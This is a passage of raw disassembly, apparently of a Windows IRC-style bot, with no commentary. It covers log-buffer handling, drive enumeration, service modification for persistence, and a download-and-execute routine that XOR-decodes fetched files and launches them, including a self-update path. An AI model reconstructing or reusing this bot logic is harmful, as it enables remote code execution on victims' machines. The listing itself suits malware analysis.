sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call ds:dword_41F028 ; GetLocalTime
mov ebx, offset dword_432FB8
mov edi, 80h
mov esi, offset dword_42EFB8
loc_401C55: ; CODE XREF: sub_401C33+3D�j
cmp byte ptr [ebx], 0
jz short loc_401C6C
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_401C6C: ; CODE XREF: sub_401C33+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_401C55
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_412E0D
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_401C33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CA7 proc near ; CODE XREF: sub_40779B+A4�p
; sub_4078FA:loc_40A8FB�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_80]
push 80h
push eax
call sub_412E64
lea eax, [ebp+var_80]
push eax
call sub_401C33
add esp, 14h
leave
retn
sub_401CA7 endp
; =============== S U B R O U T I N E =======================================
sub_401CD3 proc near ; CODE XREF: sub_4078FA+4512�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_42EFB8
xor ecx, ecx
loc_401CDA: ; CODE XREF: sub_401CD3+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_432FB8
jl short loc_401CDA
cmp [esp+arg_C], ecx
push esi
mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_401D0A
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_4045DD
add esp, 14h
loc_401D0A: ; CODE XREF: sub_401CD3+1F�j
push esi
call sub_401C33
pop ecx
pop esi
retn
sub_401CD3 endp
; =============== S U B R O U T I N E =======================================
sub_401D13 proc near ; CODE XREF: .text:0041296D�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_42EFB8
loc_401D19: ; CODE XREF: sub_401D13+27�j
cmp byte ptr [esi], 0
jz short loc_401D2E
push [esp+4+arg_0]
push esi
call sub_405AD5
test eax, eax
pop ecx
pop ecx
jnz short loc_401D40
loc_401D2E: ; CODE XREF: sub_401D13+9�j
add esi, 80h
cmp esi, offset dword_432FB8
jl short loc_401D19
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401D40: ; CODE XREF: sub_401D13+19�j
xor eax, eax
inc eax
pop esi
retn
sub_401D13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D45 proc near ; DATA XREF: sub_4078FA+45C9�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_401D98
push edx
push [ebp+var_14]
lea eax, [ebp+var_118]
push offset aLogBegin ; "[LOG]: Begin"
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401D98: ; CODE XREF: sub_401D45+33�j
cmp [ebp+var_98], 0
jz short loc_401DB8
lea eax, [ebp+var_98]
push eax
call sub_412F42
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_401DB8
mov [ebp+var_8], eax
loc_401DB8: ; CODE XREF: sub_401D45+5A�j
; sub_401D45+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_42EFB8
loc_401DC1: ; CODE XREF: sub_401D45+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_401E1B
cmp byte ptr [esi], 0
jz short loc_401E0A
cmp [ebp+var_98], 0
jz short loc_401DF0
cmp [ebp+var_4], 0
jnz short loc_401DF0
lea eax, [ebp+var_98]
push eax
push esi
call sub_405AD5
test eax, eax
pop ecx
pop ecx
jz short loc_401E0A
loc_401DF0: ; CODE XREF: sub_401D45+90�j
; sub_401D45+96�j
push edi
push [ebp+var_14]
lea eax, [ebp+var_118]
push esi
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401E0A: ; CODE XREF: sub_401D45+87�j
; sub_401D45+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_432FB8
jl short loc_401DC1
loc_401E1B: ; CODE XREF: sub_401D45+82�j
lea eax, [ebp+var_31C]
push offset aLogListComplet ; "[LOG]: List complete."
push eax
call sub_412BB5
xor esi, esi
cmp [ebp+var_10], esi
pop ecx
pop ecx
jnz short loc_401E55
push esi
push [ebp+var_14]
lea eax, [ebp+var_31C]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_4045DD
add esp, 14h
loc_401E55: ; CODE XREF: sub_401D45+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_401C33
push [ebp+var_18]
call sub_4111AE
pop ecx
pop ecx
push esi
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_401D45 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E73 proc near ; CODE XREF: sub_405915+1E�p
; sub_40D1EF+34A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset aNetworkHostSer ; "Network Host Service"
loc_401E83: ; CODE XREF: sub_401E73+6F�j
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push off_42A354[edi]
push dword_42A350[edi]
call dword_4334E8
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_401EC9
lea edx, [eax+1]
loc_401EAD: ; CODE XREF: sub_401E73+3F�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_401EAD
sub eax, edx
push eax
push [ebp+arg_0]
push 1
push ebx
push esi
push [ebp+var_4]
call dword_433484
jmp short loc_401ED3
; ---------------------------------------------------------------------------
loc_401EC9: ; CODE XREF: sub_401E73+35�j
push esi
push [ebp+var_4]
call dword_4334DC
loc_401ED3: ; CODE XREF: sub_401E73+54�j
push [ebp+var_4]
call dword_43357C
add edi, 8
cmp edi, 18h
jb short loc_401E83
pop edi
pop esi
pop ebx
leave
retn
sub_401E73 endp
; =============== S U B R O U T I N E =======================================
sub_401EE9 proc near ; CODE XREF: sub_401F06+109�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_401F05
loc_401EF5: ; CODE XREF: sub_401EE9+1A�j
mov dl, byte_42AE5C
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_401EF5
locret_401F05: ; CODE XREF: sub_401EE9+A�j
retn
sub_401EE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F06 proc near ; DATA XREF: sub_4078FA+287E�o
; sub_4078FA+2D24�o
var_88C = qword ptr -88Ch
var_880 = qword ptr -880h
var_810 = byte ptr -810h
var_610 = byte ptr -610h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_38C = byte ptr -38Ch
var_28C = byte ptr -28Ch
var_18C = byte ptr -18Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 810h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push ebx
mov esi, eax
mov ecx, 0EAh
lea edi, [ebp+var_410]
rep movsd
push ebx
xor esi, esi
push ebx
inc esi
mov [eax+3A4h], esi
push ebx
lea eax, [ebp+var_38C]
push eax
push dword_4335E0
call dword_4334A8
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_4023B5
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_28C]
push eax
call ds:dword_41F03C ; CreateFileA
cmp eax, esi
mov [ebp+var_10], eax
jnb short loc_401FCD
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_401FB0
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_401FB0: ; CODE XREF: sub_401F06+88�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
push [ebp+var_8C]
call sub_4111AE
pop ecx
jmp loc_402416
; ---------------------------------------------------------------------------
loc_401FCD: ; CODE XREF: sub_401F06+68�j
xor esi, esi
call ds:dword_41F004 ; GetTickCount
mov [ebp+var_4], eax
loc_401FD8: ; CODE XREF: sub_401F06+174�j
xor eax, eax
mov ecx, 80h
lea edi, [ebp+var_610]
rep stosd
lea eax, [ebp+arg_0]
push eax
push 200h
lea eax, [ebp+var_610]
push eax
push [ebp+var_C]
call dword_43354C
cmp [ebp+var_78], ebx
jz short loc_402016
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
call sub_401EE9
pop ecx
pop ecx
loc_402016: ; CODE XREF: sub_401F06+FD�j
push ebx
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
push [ebp+var_10]
call ds:dword_41F038 ; WriteFile
add esi, [ebp+arg_0]
cmp [ebp+var_80], ebx
jz short loc_40203B
cmp esi, [ebp+var_80]
ja short loc_402080
loc_40203B: ; CODE XREF: sub_401F06+12E�j
mov eax, esi
shr eax, 0Ah
push eax
lea eax, [ebp+var_38C]
push eax
mov eax, [ebp+var_8C]
imul eax, 234h
add eax, offset dword_434138
cmp [ebp+var_88], 1
jz short loc_402069
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_40206E
; ---------------------------------------------------------------------------
loc_402069: ; CODE XREF: sub_401F06+15A�j
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_40206E: ; CODE XREF: sub_401F06+161�j
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+arg_0], ebx
ja loc_401FD8
loc_402080: ; CODE XREF: sub_401F06+133�j
cmp [ebp+var_80], ebx
mov [ebp+var_8], 1
jz short loc_4020D5
cmp esi, [ebp+var_80]
jz short loc_4020D5
push [ebp+var_80]
lea eax, [ebp+var_610]
push esi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax
mov [ebp+var_8], ebx
call sub_412BB5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
lea eax, [ebp+var_610]
push eax
call sub_401C33
add esp, 28h
loc_4020D5: ; CODE XREF: sub_401F06+184�j
; sub_401F06+189�j
call ds:dword_41F004 ; GetTickCount
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+var_10]
mov ecx, eax
inc ecx
mov eax, esi
div ecx
mov edi, eax
call ds:dword_41F034 ; CloseHandle
cmp [ebp+var_8], ebx
jz loc_402402
cmp [ebp+var_88], 1
jz loc_4022C6
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_402121
fadd ds:dbl_41FAD8
loc_402121: ; CODE XREF: sub_401F06+213�j
test esi, esi
fmul ds:dbl_41FAD0
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_402143
fadd ds:dbl_41FAD8
loc_402143: ; CODE XREF: sub_401F06+235�j
fmul ds:dbl_41FAD0
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_402187
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_402187: ; CODE XREF: sub_401F06+25F�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
cmp [ebp+var_84], 1
pop ecx
jnz loc_402402
cmp [ebp+var_74], ebx
jnz short loc_4021F1
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadOpenni ; "[DOWNLOAD]: Openning: %s %s."
push eax
call sub_412BB5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
lea eax, [ebp+var_610]
push eax
call sub_401C33
add esp, 28h
loc_4021F1: ; CODE XREF: sub_401F06+29E�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_68]
rep stosd
mov ecx, 80h
lea edi, [ebp+var_810]
mov [ebp+var_5C], (offset asc_41FA74+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], 1
mov [ebp+var_38], bx
rep stosd
loc_40222A: ; CODE XREF: sub_401F06+335�j
mov cl, [ebp+eax+var_28C]
mov [ebp+eax+var_810], cl
inc eax
cmp cl, bl
jnz short loc_40222A
lea edi, [ebp+var_810]
dec edi
loc_402244: ; CODE XREF: sub_401F06+344�j
mov al, [edi+1]
inc edi
cmp al, bl
jnz short loc_402244
mov esi, offset asc_41FA74 ; " "
lea eax, [ebp+var_18C]
movsw
mov edx, eax
loc_40225B: ; CODE XREF: sub_401F06+35A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40225B
lea edi, [ebp+var_810]
sub eax, edx
dec edi
loc_40226B: ; CODE XREF: sub_401F06+36B�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_40226B
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_810]
push eax
and ecx, 3
push ebx
rep movsb
call ds:dword_41F030 ; CreateProcessA
cmp eax, 1
lea eax, [ebp+var_810]
push eax
lea eax, [ebp+var_610]
jnz short loc_4022BC
push offset aDownloadApplic ; "[DOWNLOAD]: Application succesfully exe"...
jmp loc_4023C7
; ---------------------------------------------------------------------------
loc_4022BC: ; CODE XREF: sub_401F06+3AA�j
push offset aDownloadExecut ; "[DOWNLOAD]: Execution failed: Error exe"...
jmp loc_4023C7
; ---------------------------------------------------------------------------
loc_4022C6: ; CODE XREF: sub_401F06+205�j
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_4022D6
fadd ds:dbl_41FAD8
loc_4022D6: ; CODE XREF: sub_401F06+3C8�j
test esi, esi
fmul ds:dbl_41FAD0
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_4022F8
fadd ds:dbl_41FAD8
loc_4022F8: ; CODE XREF: sub_401F06+3EA�j
fmul ds:dbl_41FAD0
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax
call sub_412BB5
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_40233C
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_40233C: ; CODE XREF: sub_401F06+414�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
xor eax, eax
pop ecx
lea edi, [ebp+var_24]
stosd
stosd
push 11h
stosd
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_28C]
xor esi, esi
push eax
inc esi
push ebx
mov [ebp+var_5C], (offset asc_41FA74+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], esi
mov [ebp+var_38], bx
call ds:dword_41F030 ; CreateProcessA
cmp eax, esi
jnz short loc_4023A7
call dword_4335B8
call sub_405915
push ebx
call ds:dword_41F02C ; ExitProcess
loc_4023A7: ; CODE XREF: sub_401F06+48D�j
lea eax, [ebp+var_28C]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_4023C1
; ---------------------------------------------------------------------------
loc_4023B5: ; CODE XREF: sub_401F06+45�j
lea eax, [ebp+var_38C]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_4023C1: ; CODE XREF: sub_401F06+4AD�j
lea eax, [ebp+var_610]
loc_4023C7: ; CODE XREF: sub_401F06+3B1�j
; sub_401F06+3BB�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_4023F5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4045DD
add esp, 14h
loc_4023F5: ; CODE XREF: sub_401F06+4CD�j
lea eax, [ebp+var_610]
push eax
call sub_401C33
pop ecx
loc_402402: ; CODE XREF: sub_401F06+1F8�j
; sub_401F06+295�j
push [ebp+var_C]
call dword_4334FC
push [ebp+var_8C]
call sub_4111AE
loc_402416: ; CODE XREF: sub_401F06+C2�j
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_401F06 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40241F proc near ; CODE XREF: sub_4078FA+4C27�p
; sub_4078FA+4D7A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4134AF
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40241F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402439 proc near ; CODE XREF: sub_40253D+66�p
; sub_40253D+97�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 0Ch
mov esi, offset dword_432FB8
pop ecx
xor eax, eax
mov edi, esi
rep stosd
stosw
lea edi, [ebp+var_40]
push ebx
loc_402459: ; CODE XREF: sub_402439+50�j
; sub_402439+56�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_413500
add cl, 30h
mov [edi], cl
inc edi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_402491
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_402459
mov byte ptr [edi], 2Ch
inc edi
jmp short loc_402459
; ---------------------------------------------------------------------------
loc_402491: ; CODE XREF: sub_402439+40�j
mov eax, esi
pop ebx
jmp short loc_40249B
; ---------------------------------------------------------------------------
loc_402496: ; CODE XREF: sub_402439+68�j
mov cl, [edi]
mov [eax], cl
inc eax
loc_40249B: ; CODE XREF: sub_402439+5B�j
dec edi
lea ecx, [ebp+var_40]
cmp edi, ecx
jnb short loc_402496
and byte ptr [eax], 0
pop edi
mov eax, esi
pop esi
leave
retn
sub_402439 endp
; =============== S U B R O U T I N E =======================================
sub_4024AC proc near ; CODE XREF: sub_402658+3E�p
; sub_402658+74�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43342C
sub eax, 0
jz short loc_4024EF
dec eax
jz short loc_4024E9
dec eax
dec eax
jz short loc_4024E3
dec eax
jz short loc_4024DD
dec eax
jz short loc_4024D7
dec eax
jz short loc_4024D1
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_4024D1: ; CODE XREF: sub_4024AC+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_4024D7: ; CODE XREF: sub_4024AC+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_4024DD: ; CODE XREF: sub_4024AC+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_4024E3: ; CODE XREF: sub_4024AC+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_4024E9: ; CODE XREF: sub_4024AC+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_4024EF: ; CODE XREF: sub_4024AC+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_4024AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024F5 proc near ; CODE XREF: sub_40253D+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_43349C
test eax, eax
jz short loc_40252A
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax
loc_40252A: ; CODE XREF: sub_4024F5+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_4024F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40253D proc near ; CODE XREF: sub_402658+17�p
; sub_40FE1F+1BD�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_4024F5
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_402615
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_402615
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_402615
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_412E0D
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_412E0D
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_4135A0
push edx
push eax
call sub_402439
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_412E0D
add esp, 18h
pop ebx
jmp short loc_402644
; ---------------------------------------------------------------------------
loc_402615: ; CODE XREF: sub_40253D+2C�j
; sub_40253D+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_412BB5
lea eax, [ebp+var_130]
push esi
push eax
call sub_412BB5
lea eax, [ebp+var_B0]
push esi
push eax
call sub_412BB5
add esp, 18h
loc_402644: ; CODE XREF: sub_40253D+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_40253D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402658 proc near ; CODE XREF: sub_402717+B�j
; sub_402717+51�p
var_500 = byte ptr -500h
var_380 = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_40253D
pop ecx
pop ecx
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+var_180]
rep movsd
push 7
mov edi, offset aFailed ; "failed"
lea esi, [ebp+var_80]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4026B8
push ebx
push ebx
call sub_4024AC
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_412E0D
add esp, 14h
jmp short loc_4026EC
; ---------------------------------------------------------------------------
loc_4026B8: ; CODE XREF: sub_402658+3A�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_4024AC
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_412E0D
add esp, 20h
loc_4026EC: ; CODE XREF: sub_402658+5E�j
push 1
push [ebp+arg_8]
lea eax, [ebp+var_380]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
lea eax, [ebp+var_380]
push eax
call sub_401C33
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_402658 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402717 proc near ; CODE XREF: sub_4078FA+4268�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_402727
pop ebp
jmp sub_402658
; ---------------------------------------------------------------------------
loc_402727: ; CODE XREF: sub_402717+8�j
push ebx
push esi
push eax
push eax
call dword_43353C
lea esi, [eax+2]
push esi
call sub_41344D
pop ecx
mov ebx, eax
push ebx
push esi
mov [ebp+arg_C], ebx
call dword_43353C
cmp byte ptr [ebx], 0
jz short loc_40278A
push edi
loc_40274E: ; CODE XREF: sub_402717+6D�j
push 4
mov edi, offset aA ; "A:\\"
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_402770
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402658
add esp, 10h
loc_402770: ; CODE XREF: sub_402717+45�j
mov eax, ebx
lea edx, [eax+1]
loc_402775: ; CODE XREF: sub_402717+63�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402775
sub eax, edx
lea ebx, [ebx+eax+1]
cmp [ebx], cl
jnz short loc_40274E
mov ebx, [ebp+arg_C]
pop edi
loc_40278A: ; CODE XREF: sub_402717+34�j
push ebx
call sub_412FE4
pop ecx
pop esi
pop ebx
pop ebp
retn
sub_402717 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402795 proc near ; DATA XREF: sub_40D1EF+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_434344
call dword_4335AC
call sub_41105B
call dword_4335B8
call dword_4335B8
mov ebx, ds:dword_41F000
push 64h
call ebx ; Sleep
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 11h
